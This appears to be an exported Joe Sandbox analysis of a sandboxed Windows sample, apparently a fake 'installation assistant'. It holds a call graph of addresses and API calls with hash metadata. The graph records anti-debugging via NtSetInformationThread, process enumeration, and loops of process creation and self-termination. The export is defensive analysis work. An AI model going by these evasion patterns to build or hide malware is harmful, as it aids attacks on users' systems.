100450 6c55e010 67 API calls 100448->100450 100454 6c695ae2 std::ios_base::_Ios_base_dtor 100450->100454 100451 6c695a54 101011 6c695b90 100451->101011 100454->100303 100455->100446 100455->100451 100993 6c696340 100455->100993 101001 6c572000 100455->101001 100456 6c695a5c 100457 6c537090 77 API calls 100456->100457 100457->100446 100458->100293 100460 6c6952a0 std::locale::_Setgloballocale 100459->100460 100461 6c695277 CloseHandle 100460->100461 100462 6c695320 Process32NextW 100460->100462 100463 6c6953b1 100460->100463 100464 6c695345 Process32FirstW 100460->100464 100461->100460 100462->100460 100463->100223 100464->100460 100465->100243 100467->100222 100468->100355 100469->100363 100470->100365 100471->100358 100472->100362 100475 6c66b743 _Yarn __wsopen_s std::locale::_Setgloballocale 100473->100475 100474 6c66c180 100474->100384 100475->100474 100477 6c66bced CreateFileA 100475->100477 100478 6c66aa30 100475->100478 100477->100475 100481 6c66aa43 __wsopen_s std::locale::_Setgloballocale 100478->100481 100479 6c66b3e9 WriteFile 100479->100481 100480 6c66b43d WriteFile 100480->100481 100481->100479 100481->100480 100482 6c66b718 100481->100482 100483 6c66ab95 ReadFile 100481->100483 100482->100475 100483->100481 100485 6c696a43 std::_Facet_Register 4 API calls 100484->100485 100486 6c56207e 100485->100486 100487 6c697327 43 API calls 100486->100487 100488 6c562092 100487->100488 100523 6c562f60 42 API calls 4 library calls 100488->100523 100490 6c56210d 100493 6c562120 100490->100493 100524 6c696f8e 9 API calls 2 library calls 100490->100524 100491 6c5620c8 100491->100490 100492 6c562136 100491->100492 100525 6c562250 30 API calls 100492->100525 100493->100390 100496 6c56215b 100526 6c562340 24 API calls 100496->100526 100498 6c562171 100527 6c699379 RaiseException 100498->100527 100500 6c56217c 100500->100390 100502 6c697333 __EH_prolog3 100501->100502 100528 6c696eb5 100502->100528 100507 6c697351 100542 6c6973ba 39 API calls std::locale::_Setgloballocale 100507->100542 100509 6c6973ac 100509->100394 100510 6c697359 100543 6c6971b1 HeapFree GetLastError _Yarn ___std_exception_destroy 100510->100543 100512 6c69736f 100534 6c696ee6 100512->100534 100514 6c536d5d 100513->100514 100515 6c561ddc 100513->100515 100514->100397 100520 6c562250 30 API calls 100514->100520 100548 6c697447 100515->100548 100519 6c561e82 100520->100399 100521->100401 100522->100403 100523->100491 100524->100493 100525->100496 100526->100498 100527->100500 100529 6c696ec4 100528->100529 100532 6c696ecb 100528->100532 100544 6c6a03cd 6 API calls std::_Lockit::_Lockit 100529->100544 100531 6c696ec9 100531->100512 100541 6c697230 6 API calls 2 library calls 100531->100541 100532->100531 100545 6c69858b EnterCriticalSection 100532->100545 100535 6c6a03db 100534->100535 100536 6c696ef0 100534->100536 100547 6c6a03b6 LeaveCriticalSection 100535->100547 100537 6c696f03 100536->100537 100546 6c698599 LeaveCriticalSection 100536->100546 100537->100509 100540 6c6a03e2 100540->100509 100541->100507 100542->100510 100543->100512 100544->100531 100545->100531 100546->100537 100547->100540 100549 6c697450 100548->100549 100550 6c561dea 100549->100550 100557 6c69fd4a 100549->100557 100550->100514 100556 6c69c563 18 API calls __wsopen_s 100550->100556 100552 6c69749c 100552->100550 100568 6c69fa58 65 API calls 100552->100568 100554 6c6974b7 100554->100550 100569 6c6a0b18 100554->100569 100556->100519 100558 6c69fd55 __wsopen_s 100557->100558 100559 6c69fd68 100558->100559 100560 6c69fd88 100558->100560 100594 6c6a0120 18 API calls __wsopen_s 100559->100594 100564 6c69fd78 100560->100564 100580 6c6aae0c 100560->100580 100564->100552 100568->100554 100570 6c6a0b24 __wsopen_s 100569->100570 100571 6c6a0b2e 100570->100571 100572 6c6a0b43 100570->100572 100790 6c6a0120 18 API calls __wsopen_s 100571->100790 100576 6c6a0b3e 100572->100576 100775 6c69c5a9 EnterCriticalSection 100572->100775 100574 6c6a0b60 100776 6c6a0b9c 100574->100776 100576->100550 100578 6c6a0b6b 100791 6c6a0b92 LeaveCriticalSection 100578->100791 100581 6c6aae18 __wsopen_s 100580->100581 100596 6c6a039f EnterCriticalSection 100581->100596 100583 6c6aae26 100597 6c6aaeb0 100583->100597 100588 6c6aaf72 100589 6c6ab091 100588->100589 100621 6c6ab114 100589->100621 100592 6c69fdcc 100595 6c69fdf5 LeaveCriticalSection 100592->100595 100594->100564 100595->100564 100596->100583 100605 6c6aaed3 100597->100605 100598 6c6aae33 100611 6c6aae6c 100598->100611 100599 6c6aaf2b 100616 6c6a71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100599->100616 100601 6c6aaf34 100617 6c6a47bb HeapFree GetLastError _free 100601->100617 100604 6c6aaf3d 100604->100598 100618 6c6a6c1f 6 API calls std::_Lockit::_Lockit 100604->100618 100605->100598 100605->100599 100605->100605 100614 6c69c5a9 EnterCriticalSection 100605->100614 100615 6c69c5bd LeaveCriticalSection 100605->100615 100607 6c6aaf5c 100619 6c69c5a9 EnterCriticalSection 100607->100619 100610 6c6aaf6f 100610->100598 100620 6c6a03b6 LeaveCriticalSection 100611->100620 100613 6c69fda3 100613->100564 100613->100588 100614->100605 100615->100605 100616->100601 100617->100604 100618->100607 100619->100610 100620->100613 100622 6c6ab133 100621->100622 100623 6c6ab146 100622->100623 100624 6c6ab15b 100622->100624 100637 6c6a0120 18 API calls __wsopen_s 100623->100637 100626 6c6ab27b 100624->100626 100638 6c6b3ea8 37 API calls __wsopen_s 100624->100638 100627 6c6ab0a7 100626->100627 100641 6c6a0120 18 API calls __wsopen_s 100626->100641 100627->100592 100634 6c6b3fde 100627->100634 100630 6c6ab2cb 100630->100626 100639 6c6b3ea8 37 API calls __wsopen_s 100630->100639 100632 6c6ab2e9 100632->100626 100640 6c6b3ea8 37 API calls __wsopen_s 100632->100640 100642 6c6b4396 100634->100642 100637->100627 100638->100630 100639->100632 100640->100626 100641->100627 100644 6c6b43a2 __wsopen_s 100642->100644 100643 6c6b43a9 100660 6c6a0120 18 API calls __wsopen_s 100643->100660 100644->100643 100645 6c6b43d4 100644->100645 100651 6c6b3ffe 100645->100651 100649 6c6b3ff9 100649->100592 100662 6c6a06cb 100651->100662 100656 6c6b4034 100658 6c6b4066 100656->100658 100702 6c6a47bb HeapFree GetLastError _free 100656->100702 100661 6c6b442b LeaveCriticalSection __wsopen_s 100658->100661 100660->100649 100661->100649 100703 6c69bceb 100662->100703 100665 6c6a06ef 100667 6c69bdf6 100665->100667 100712 6c69be4e 100667->100712 100669 6c69be0e 100669->100656 100670 6c6b406c 100669->100670 100727 6c6b44ec 100670->100727 100676 6c6b409e __dosmaperr 100676->100656 100677 6c6b4192 GetFileType 100678 6c6b419d GetLastError 100677->100678 100679 6c6b41e4 100677->100679 100756 6c69f9f2 __dosmaperr _free 100678->100756 100757 6c6b17b0 SetStdHandle __dosmaperr __wsopen_s 100679->100757 100680 6c6b4167 GetLastError 100680->100676 100681 6c6b4115 100681->100677 100681->100680 100755 6c6b4457 CreateFileW 100681->100755 100684 6c6b41ab CloseHandle 100684->100676 100698 6c6b41d4 100684->100698 100686 6c6b415a 100686->100677 100686->100680 100687 6c6b4205 100688 6c6b4251 100687->100688 100758 6c6b4666 70 API calls 2 library calls 100687->100758 100692 6c6b4258 100688->100692 100772 6c6b4710 70 API calls 2 library calls 100688->100772 100691 6c6b4286 100691->100692 100693 6c6b4294 100691->100693 100759 6c6ab925 100692->100759 100693->100676 100695 6c6b4310 CloseHandle 100693->100695 100773 6c6b4457 CreateFileW 100695->100773 100697 6c6b433b 100697->100698 100699 6c6b4345 GetLastError 100697->100699 100698->100676 100700 6c6b4351 __dosmaperr 100699->100700 100774 6c6b171f SetStdHandle __dosmaperr __wsopen_s 100700->100774 100702->100658 100704 6c69bd0b 100703->100704 100705 6c69bd02 100703->100705 100704->100705 100706 6c6a49b2 __Getctype 37 API calls 100704->100706 100705->100665 100711 6c6a69d5 5 API calls std::_Lockit::_Lockit 100705->100711 100707 6c69bd2b 100706->100707 100708 6c6a4f28 __Getctype 37 API calls 100707->100708 100709 6c69bd41 100708->100709 100710 6c6a4f55 __fassign 37 API calls 100709->100710 100710->100705 100711->100665 100713 6c69be5c 100712->100713 100714 6c69be76 100712->100714 100715 6c69bddc __wsopen_s HeapFree GetLastError 100713->100715 100716 6c69be9c 100714->100716 100717 6c69be7d 100714->100717 100726 6c69be66 __dosmaperr 100715->100726 100718 6c6a4843 __fassign MultiByteToWideChar 100716->100718 100719 6c69bd9d __wsopen_s HeapFree GetLastError 100717->100719 100717->100726 100720 6c69beab 100718->100720 100719->100726 100721 6c69beb2 GetLastError 100720->100721 100722 6c69bed8 100720->100722 100723 6c69bd9d __wsopen_s HeapFree GetLastError 100720->100723 100721->100726 100724 6c6a4843 __fassign MultiByteToWideChar 100722->100724 100722->100726 100723->100722 100725 6c69beef 100724->100725 100725->100721 100725->100726 100726->100669 100728 6c6b4527 100727->100728 100730 6c6b450d 100727->100730 100729 6c6b447c __wsopen_s 18 API calls 100728->100729 100734 6c6b455f 100729->100734 100730->100728 100731 6c6a0120 __wsopen_s 18 API calls 100730->100731 100731->100728 100732 6c6b458e 100733 6c6b5911 __wsopen_s 18 API calls 100732->100733 100735 6c6b4089 100732->100735 100736 6c6b45dc 100733->100736 100734->100732 100737 6c6a0120 __wsopen_s 18 API calls 100734->100737 100735->100676 100741 6c6b160c 100735->100741 100736->100735 100738 6c6b4659 100736->100738 100737->100732 100739 6c6a014d __Getctype 11 API calls 100738->100739 100740 6c6b4665 100739->100740 100742 6c6b1618 __wsopen_s 100741->100742 100743 6c6a039f std::_Lockit::_Lockit EnterCriticalSection 100742->100743 100744 6c6b161f 100743->100744 100746 6c6b1644 100744->100746 100750 6c6b16b3 EnterCriticalSection 100744->100750 100752 6c6b1666 100744->100752 100745 6c6b1716 __wsopen_s LeaveCriticalSection 100747 6c6b1686 100745->100747 100748 6c6b1842 __wsopen_s 11 API calls 100746->100748 100747->100676 100754 6c6b4457 CreateFileW 100747->100754 100749 6c6b1649 100748->100749 100751 6c6b1990 __wsopen_s EnterCriticalSection 100749->100751 100749->100752 100750->100752 100753 6c6b16c0 LeaveCriticalSection 100750->100753 100751->100752 100752->100745 100753->100744 100754->100681 100755->100686 100756->100684 100757->100687 100758->100688 100760 6c6b15a2 __wsopen_s 18 API calls 100759->100760 100762 6c6ab935 100760->100762 100761 6c6ab93b 100763 6c6b171f __wsopen_s SetStdHandle 100761->100763 100762->100761 100764 6c6b15a2 __wsopen_s 18 API calls 100762->100764 100771 6c6ab96d 100762->100771 100768 6c6ab993 __dosmaperr 100763->100768 100766 6c6ab964 100764->100766 100765 6c6b15a2 __wsopen_s 18 API calls 100767 6c6ab979 CloseHandle 100765->100767 100769 6c6b15a2 __wsopen_s 18 API calls 100766->100769 100767->100761 100770 6c6ab985 GetLastError 100767->100770 100768->100676 100769->100771 100770->100761 100771->100761 100771->100765 100772->100691 100773->100697 100774->100698 100775->100574 100777 6c6a0ba9 100776->100777 100778 6c6a0bbe 100776->100778 100814 6c6a0120 18 API calls __wsopen_s 100777->100814 100780 6c6a0bb9 100778->100780 100792 6c6a0cb9 100778->100792 100780->100578 100786 6c6a0be1 100807 6c6ab898 100786->100807 100788 6c6a0be7 100788->100780 100815 6c6a47bb HeapFree GetLastError _free 100788->100815 100790->100576 100791->100576 100793 6c6a0cd1 100792->100793 100797 6c6a0bd3 100792->100797 100794 6c6a9c60 18 API calls 100793->100794 100793->100797 100795 6c6a0cef 100794->100795 100816 6c6abb6c 100795->100816 100798 6c6a873e 100797->100798 100799 6c6a0bdb 100798->100799 100800 6c6a8755 100798->100800 100802 6c6a9c60 100799->100802 100800->100799 100904 6c6a47bb HeapFree GetLastError _free 100800->100904 100803 6c6a9c81 100802->100803 100804 6c6a9c6c 100802->100804 100803->100786 100905 6c6a0120 18 API calls __wsopen_s 100804->100905 100806 6c6a9c7c 100806->100786 100808 6c6ab8be 100807->100808 100812 6c6ab8a9 __dosmaperr 100807->100812 100809 6c6ab8e5 100808->100809 100811 6c6ab907 __dosmaperr 100808->100811 100906 6c6ab9c1 100809->100906 100914 6c6a0120 18 API calls __wsopen_s 100811->100914 100812->100788 100814->100780 100815->100780 100817 6c6abb78 __wsopen_s 100816->100817 100818 6c6abbca 100817->100818 100819 6c6abc33 __dosmaperr 100817->100819 100823 6c6abb80 __dosmaperr 100817->100823 100827 6c6b1990 EnterCriticalSection 100818->100827 100857 6c6a0120 18 API calls __wsopen_s 100819->100857 100821 6c6abbd0 100825 6c6abbec __dosmaperr 100821->100825 100828 6c6abc5e 100821->100828 100823->100797 100856 6c6abc2b LeaveCriticalSection __wsopen_s 100825->100856 100827->100821 100829 6c6abc80 100828->100829 100855 6c6abc9c __dosmaperr 100828->100855 100830 6c6abcd4 100829->100830 100832 6c6abc84 __dosmaperr 100829->100832 100831 6c6abce7 100830->100831 100866 6c6aac69 20 API calls __wsopen_s 100830->100866 100858 6c6abe40 100831->100858 100865 6c6a0120 18 API calls __wsopen_s 100832->100865 100837 6c6abd3c 100839 6c6abd50 100837->100839 100840 6c6abd95 WriteFile 100837->100840 100838 6c6abcfd 100841 6c6abd01 100838->100841 100842 6c6abd26 100838->100842 100843 6c6abd5b 100839->100843 100844 6c6abd85 100839->100844 100845 6c6abdb9 GetLastError 100840->100845 100840->100855 100841->100855 100867 6c6ac25b 6 API calls __wsopen_s 100841->100867 100868 6c6abeb1 43 API calls 5 library calls 100842->100868 100847 6c6abd60 100843->100847 100848 6c6abd75 100843->100848 100871 6c6ac2c3 7 API calls 2 library calls 100844->100871 100845->100855 100851 6c6abd65 100847->100851 100847->100855 100870 6c6ac487 8 API calls 3 library calls 100848->100870 100869 6c6ac39e 7 API calls 2 library calls 100851->100869 100853 6c6abd73 100853->100855 100855->100825 100856->100823 100857->100823 100872 6c6b19e5 100858->100872 100860 6c6abe51 100861 6c6abcf8 100860->100861 100877 6c6a49b2 GetLastError 100860->100877 100861->100837 100861->100838 100864 6c6abe8e GetConsoleMode 100864->100861 100865->100855 100866->100831 100867->100855 100868->100855 100869->100853 100870->100853 100871->100853 100873 6c6b19ff 100872->100873 100874 6c6b19f2 100872->100874 100875 6c6b1a0b 100873->100875 100876 6c6a0120 __wsopen_s 18 API calls 100873->100876 100874->100860 100875->100860 100876->100874 100878 6c6a49c9 100877->100878 100882 6c6a49cf 100877->100882 100880 6c6a6b23 __Getctype 6 API calls 100878->100880 100879 6c6a6b62 __Getctype 6 API calls 100881 6c6a49ed 100879->100881 100880->100882 100883 6c6a49d5 SetLastError 100881->100883 100884 6c6a49f1 100881->100884 100882->100879 100882->100883 100890 6c6a4a69 100883->100890 100891 6c6a4a63 100883->100891 100885 6c6a71e5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 100884->100885 100887 6c6a49fd 100885->100887 100888 6c6a4a1c 100887->100888 100889 6c6a4a05 100887->100889 100892 6c6a6b62 __Getctype 6 API calls 100888->100892 100893 6c6a6b62 __Getctype 6 API calls 100889->100893 100894 6c6a0ac9 __Getctype 35 API calls 100890->100894 100891->100861 100891->100864 100896 6c6a4a28 100892->100896 100897 6c6a4a13 100893->100897 100895 6c6a4a6e 100894->100895 100898 6c6a4a2c 100896->100898 100899 6c6a4a3d 100896->100899 100901 6c6a47bb _free HeapFree GetLastError 100897->100901 100900 6c6a6b62 __Getctype 6 API calls 100898->100900 100903 6c6a47bb _free HeapFree GetLastError 100899->100903 100900->100897 100902 6c6a4a19 100901->100902 100902->100883 100903->100902 100904->100799 100905->100806 100907 6c6ab9cd __wsopen_s 100906->100907 100915 6c6b1990 EnterCriticalSection 100907->100915 100909 6c6ab9db 100910 6c6ab925 __wsopen_s 21 API calls 100909->100910 100911 6c6aba08 100909->100911 100910->100911 100916 6c6aba41 LeaveCriticalSection __wsopen_s 100911->100916 100913 6c6aba2a 100913->100812 100914->100812 100915->100909 100916->100913 100917->100410 100918->100413 100919->100410 100920->100410 100921->100410 100923 6c56022e 100922->100923 100924 6c5370c4 100923->100924 100929 6c6a17db 100923->100929 100924->100422 100926->100424 100927->100426 100928->100428 100930 6c6a17e9 100929->100930 100931 6c6a1806 100929->100931 100930->100931 100932 6c6a180a 100930->100932 100933 6c6a17f6 100930->100933 100931->100923 100937 6c6a1a02 100932->100937 100945 6c6a0120 18 API calls __wsopen_s 100933->100945 100938 6c6a1a0e __wsopen_s 100937->100938 100946 6c69c5a9 EnterCriticalSection 100938->100946 100940 6c6a1a1c 100947 6c6a19bf 100940->100947 100944 6c6a183c 100944->100923 100945->100931 100946->100940 100955 6c6a85a6 100947->100955 100953 6c6a19f9 100954 6c6a1a51 LeaveCriticalSection 100953->100954 100954->100944 100956 6c6a9c60 18 API calls 100955->100956 100957 6c6a85b7 100956->100957 100958 6c6b19e5 __wsopen_s 18 API calls 100957->100958 100960 6c6a85bd __wsopen_s 100958->100960 100959 6c6a19d3 100962 6c6a183e 100959->100962 100960->100959 100972 6c6a47bb HeapFree GetLastError _free 100960->100972 100964 6c6a1850 100962->100964 100966 6c6a186e 100962->100966 100963 6c6a185e 100973 6c6a0120 18 API calls __wsopen_s 100963->100973 100964->100963 100964->100966 100969 6c6a1886 _Yarn 100964->100969 100971 6c6a8659 62 API calls 100966->100971 100967 6c6a0cb9 62 API calls 100967->100969 100968 6c6a9c60 18 API calls 100968->100969 100969->100966 100969->100967 100969->100968 100970 6c6abb6c __wsopen_s 62 API calls 100969->100970 100970->100969 100971->100953 100972->100959 100973->100966 100975 6c696025 100974->100975 100976 6c562020 52 API calls 100975->100976 100977 6c6960c6 100976->100977 100978 6c696a43 std::_Facet_Register 4 API calls 100977->100978 100979 6c6960fe 100978->100979 100980 6c697327 43 API calls 100979->100980 100981 6c696112 100980->100981 100982 6c561d90 89 API calls 100981->100982 100983 6c6961bb 100982->100983 100984 6c6961ec 100983->100984 101026 6c562250 30 API calls 100983->101026 100984->100444 100986 6c696226 101027 6c5626e0 24 API calls 4 library calls 100986->101027 100988 6c696238 101028 6c699379 RaiseException 100988->101028 100990 6c69624d 100991 6c55e010 67 API calls 100990->100991 100992 6c69625f 100991->100992 100992->100444 100994 6c69638d 100993->100994 101029 6c6965a0 100994->101029 100996 6c69647c 100996->100455 101000 6c6963a5 101000->100996 101047 6c562250 30 API calls 101000->101047 101048 6c5626e0 24 API calls 4 library calls 101000->101048 101049 6c699379 RaiseException 101000->101049 101002 6c57203f 101001->101002 101005 6c572053 101002->101005 101058 6c563560 32 API calls std::_Xinvalid_argument 101002->101058 101007 6c57210e 101005->101007 101060 6c562250 30 API calls 101005->101060 101061 6c5626e0 24 API calls 4 library calls 101005->101061 101062 6c699379 RaiseException 101005->101062 101010 6c572121 101007->101010 101059 6c5637e0 32 API calls std::_Xinvalid_argument 101007->101059 101010->100455 101012 6c695b9e 101011->101012 101019 6c695bd1 101011->101019 101014 6c5601f0 64 API calls 101012->101014 101013 6c695c83 101013->100456 101015 6c695bc4 101014->101015 101017 6c6a0b18 67 API calls 101015->101017 101017->101019 101018 6c695cae 101064 6c562340 24 API calls 101018->101064 101019->101013 101063 6c562250 30 API calls 101019->101063 101021 6c695cbe 101065 6c699379 RaiseException 101021->101065 101023 6c695cc9 101024 6c55e010 67 API calls 101023->101024 101025 6c695d22 std::ios_base::_Ios_base_dtor 101024->101025 101025->100456 101026->100986 101027->100988 101028->100990 101030 6c696608 101029->101030 101031 6c6965dc 101029->101031 101038 6c696619 101030->101038 101050 6c563560 32 API calls std::_Xinvalid_argument 101030->101050 101032 6c696601 101031->101032 101052 6c562250 30 API calls 101031->101052 101032->101000 101035 6c6967e8 101053 6c562340 24 API calls 101035->101053 101037 6c6967f7 101054 6c699379 RaiseException 101037->101054 101038->101032 101051 6c562f60 42 API calls 4 library calls 101038->101051 101041 6c696653 101041->101032 101055 6c562250 30 API calls 101041->101055 101043 6c696827 101056 6c562340 24 API calls 101043->101056 101045 6c69683d 101057 6c699379 RaiseException 101045->101057 101047->101000 101048->101000 101049->101000 101050->101038 101051->101041 101052->101035 101053->101037 101054->101041 101055->101043 101056->101045 101057->101032 101058->101005 101059->101010 101060->101005 101061->101005 101062->101005 101063->101018 101064->101021 101065->101023 101066 6c513d62 101068 6c513bc0 101066->101068 101067 6c513e8a GetCurrentThread NtSetInformationThread 101069 6c513eea 101067->101069 101068->101067 101070 6c524a27 101071 6c524a5d _strlen 101070->101071 101072 6c53639e 101071->101072 101073 6c525b58 101071->101073 101074 6c525b6f 101071->101074 101078 6c525b09 _Yarn 101071->101078 101161 6c6a0130 18 API calls 2 library calls 101072->101161 101076 6c696a43 std::_Facet_Register 4 API calls 101073->101076 101077 6c696a43 std::_Facet_Register 4 API calls 101074->101077 101076->101078 101077->101078 101079 6c68aec0 2 API calls 101078->101079 101081 6c525bad std::ios_base::_Ios_base_dtor 101079->101081 101080 6c694ff0 4 API calls 101090 6c5261cb _strlen 101080->101090 101081->101072 101081->101080 101084 6c529ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 101081->101084 101082 6c696a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101082->101084 101083 6c68aec0 2 API calls 101083->101084 101084->101072 101084->101082 101084->101083 101085 6c52a292 Sleep 101084->101085 101104 6c52e619 101084->101104 101111 6c529bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 101085->101111 101086 6c526624 101089 6c696a43 std::_Facet_Register 4 API calls 101086->101089 101087 6c52660d 101088 6c696a43 std::_Facet_Register 4 API calls 101087->101088 101095 6c5265bc _Yarn _strlen 101088->101095 101089->101095 101090->101072 101090->101086 101090->101087 101090->101095 101091 6c694ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 101091->101111 101092 6c529bbd GetCurrentProcess TerminateProcess 101092->101084 101093 6c5363b2 101162 6c5115e0 18 API calls std::ios_base::_Ios_base_dtor 101093->101162 101095->101093 101097 6c526970 101095->101097 101098 6c526989 101095->101098 101101 6c526920 _Yarn 101095->101101 101096 6c5364f8 101099 6c696a43 std::_Facet_Register 4 API calls 101097->101099 101100 6c696a43 std::_Facet_Register 4 API calls 101098->101100 101099->101101 101100->101101 101102 6c695960 104 API calls 101101->101102 101105 6c5269d6 std::ios_base::_Ios_base_dtor _strlen 101102->101105 101103 6c52f243 CreateFileA 101112 6c52f2a7 101103->101112 101104->101103 101105->101072 101106 6c526dd2 101105->101106 101107 6c526dbb 101105->101107 101113 6c526d69 _Yarn _strlen 101105->101113 101109 6c696a43 std::_Facet_Register 4 API calls 101106->101109 101108 6c696a43 std::_Facet_Register 4 API calls 101107->101108 101108->101113 101109->101113 101110 6c5302ca 101111->101072 101111->101084 101111->101091 101111->101092 101111->101093 101133 6c696a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101111->101133 101151 6c695960 104 API calls 101111->101151 101112->101110 101119 6c5302ac GetCurrentProcess TerminateProcess 101112->101119 101113->101093 101114 6c527440 101113->101114 101115 6c527427 101113->101115 101120 6c5273da _Yarn 101113->101120 101117 6c696a43 std::_Facet_Register 4 API calls 101114->101117 101116 6c696a43 std::_Facet_Register 4 API calls 101115->101116 101116->101120 101117->101120 101118 6c695960 104 API calls 101121 6c52748d std::ios_base::_Ios_base_dtor _strlen 101118->101121 101119->101110 101120->101118 101121->101072 101122 6c527991 101121->101122 101123 6c5279a8 101121->101123 101126 6c527940 _Yarn _strlen 101121->101126 101124 6c696a43 std::_Facet_Register 4 API calls 101122->101124 101125 6c696a43 std::_Facet_Register 4 API calls 101123->101125 101124->101126 101125->101126 101126->101093 101127 6c527de2 101126->101127 101128 6c527dc9 101126->101128 101131 6c527d7c _Yarn 101126->101131 101130 6c696a43 std::_Facet_Register 4 API calls 101127->101130 101129 6c696a43 std::_Facet_Register 4 API calls 101128->101129 101129->101131 101130->101131 101132 6c695960 104 API calls 101131->101132 101134 6c527e2f std::ios_base::_Ios_base_dtor _strlen 101132->101134 101133->101111 101134->101072 101135 6c5285a8 101134->101135 101136 6c5285bf 101134->101136 101139 6c528556 _Yarn _strlen 101134->101139 101137 6c696a43 std::_Facet_Register 4 API calls 101135->101137 101138 6c696a43 std::_Facet_Register 4 API calls 101136->101138 101137->101139 101138->101139 101139->101093 101140 6c528983 101139->101140 101141 6c52896a 101139->101141 101144 6c52891d _Yarn 101139->101144 101143 6c696a43 std::_Facet_Register 4 API calls 101140->101143 101142 6c696a43 std::_Facet_Register 4 API calls 101141->101142 101142->101144 101143->101144 101145 6c695960 104 API calls 101144->101145 101148 6c5289d0 std::ios_base::_Ios_base_dtor _strlen 101145->101148 101146 6c528f36 101150 6c696a43 std::_Facet_Register 4 API calls 101146->101150 101147 6c528f1f 101149 6c696a43 std::_Facet_Register 4 API calls 101147->101149 101148->101072 101148->101146 101148->101147 101152 6c528ecd _Yarn _strlen 101148->101152 101149->101152 101150->101152 101151->101111 101152->101093 101153 6c529354 101152->101153 101154 6c52936d 101152->101154 101157 6c529307 _Yarn 101152->101157 101155 6c696a43 std::_Facet_Register 4 API calls 101153->101155 101156 6c696a43 std::_Facet_Register 4 API calls 101154->101156 101155->101157 101156->101157 101158 6c695960 104 API calls 101157->101158 101160 6c5293ba std::ios_base::_Ios_base_dtor 101158->101160 101159 6c694ff0 4 API calls 101159->101084 101160->101072 101160->101159 101162->101096 101163 6c69ef3f 101164 6c69ef4b __wsopen_s 101163->101164 101165 6c69ef5f 101164->101165 101166 6c69ef52 GetLastError ExitThread 101164->101166 101167 6c6a49b2 __Getctype 37 API calls 101165->101167 101168 6c69ef64 101167->101168 101175 6c6a9d66 101168->101175 101171 6c69ef7b 101181 6c69eeaa 16 API calls 2 library calls 101171->101181 101174 6c69ef9d 101176 6c6a9d78 GetPEB 101175->101176 101177 6c69ef6f 101175->101177 101176->101177 101178 6c6a9d8b 101176->101178 101177->101171 101180 6c6a6d6f 5 API calls std::_Lockit::_Lockit 101177->101180 101182 6c6a6e18 5 API calls std::_Lockit::_Lockit 101178->101182 101180->101171 101181->101174 101182->101177 101183 6c6acad3 101185 6c6acae5 __dosmaperr 101183->101185 101186 6c6acafd 101183->101186 101184 6c6acb48 __dosmaperr 101225 6c6a0120 18 API calls __wsopen_s 101184->101225 101186->101184 101186->101185 101188 6c6acb77 101186->101188 101189 6c6acb90 101188->101189 101190 6c6acbab __dosmaperr 101188->101190 101193 6c6acbe7 __wsopen_s 101188->101193 101189->101190 101192 6c6acb95 101189->101192 101218 6c6a0120 18 API calls __wsopen_s 101190->101218 101191 6c6b19e5 __wsopen_s 18 API calls 101194 6c6acd3e 101191->101194 101192->101191 101219 6c6a47bb HeapFree GetLastError _free 101193->101219 101198 6c6acdb4 101194->101198 101201 6c6acd57 GetConsoleMode 101194->101201 101196 6c6acc07 101220 6c6a47bb HeapFree GetLastError _free 101196->101220 101200 6c6acdb8 ReadFile 101198->101200 101203 6c6ace2c GetLastError 101200->101203 101204 6c6acdd2 101200->101204 101201->101198 101205 6c6acd68 101201->101205 101202 6c6acc0e 101216 6c6acbc2 __dosmaperr __wsopen_s 101202->101216 101221 6c6aac69 20 API calls __wsopen_s 101202->101221 101203->101216 101204->101203 101206 6c6acda9 101204->101206 101205->101200 101207 6c6acd6e ReadConsoleW 101205->101207 101211 6c6ace0e 101206->101211 101212 6c6acdf7 101206->101212 101206->101216 101207->101206 101210 6c6acd8a GetLastError 101207->101210 101210->101216 101213 6c6ace25 101211->101213 101211->101216 101223 6c6acefe 23 API calls 3 library calls 101212->101223 101224 6c6ad1b6 21 API calls __wsopen_s 101213->101224 101222 6c6a47bb HeapFree GetLastError _free 101216->101222 101217 6c6ace2a 101217->101216 101218->101216 101219->101196 101220->101202 101221->101192 101222->101185 101223->101216 101224->101217 101225->101185
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: HR^
                                                          • API String ID: 4218353326-1341859651
                                                          • Opcode ID: 3bf71dd69b10a85981a87ef39fb9859980e1ac88b4eaac86406c612b601c0118
                                                          • Instruction ID: 4c41baa49780f0648aa24ae27c4d576211e340dc1d0053a22678b6eb280932c5
                                                          • Opcode Fuzzy Hash: 3bf71dd69b10a85981a87ef39fb9859980e1ac88b4eaac86406c612b601c0118
                                                          • Instruction Fuzzy Hash: 9F741771644B028FD728CF28CCD4695B7F3EF95318B198A2DC0968BE95E778B54ACB40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
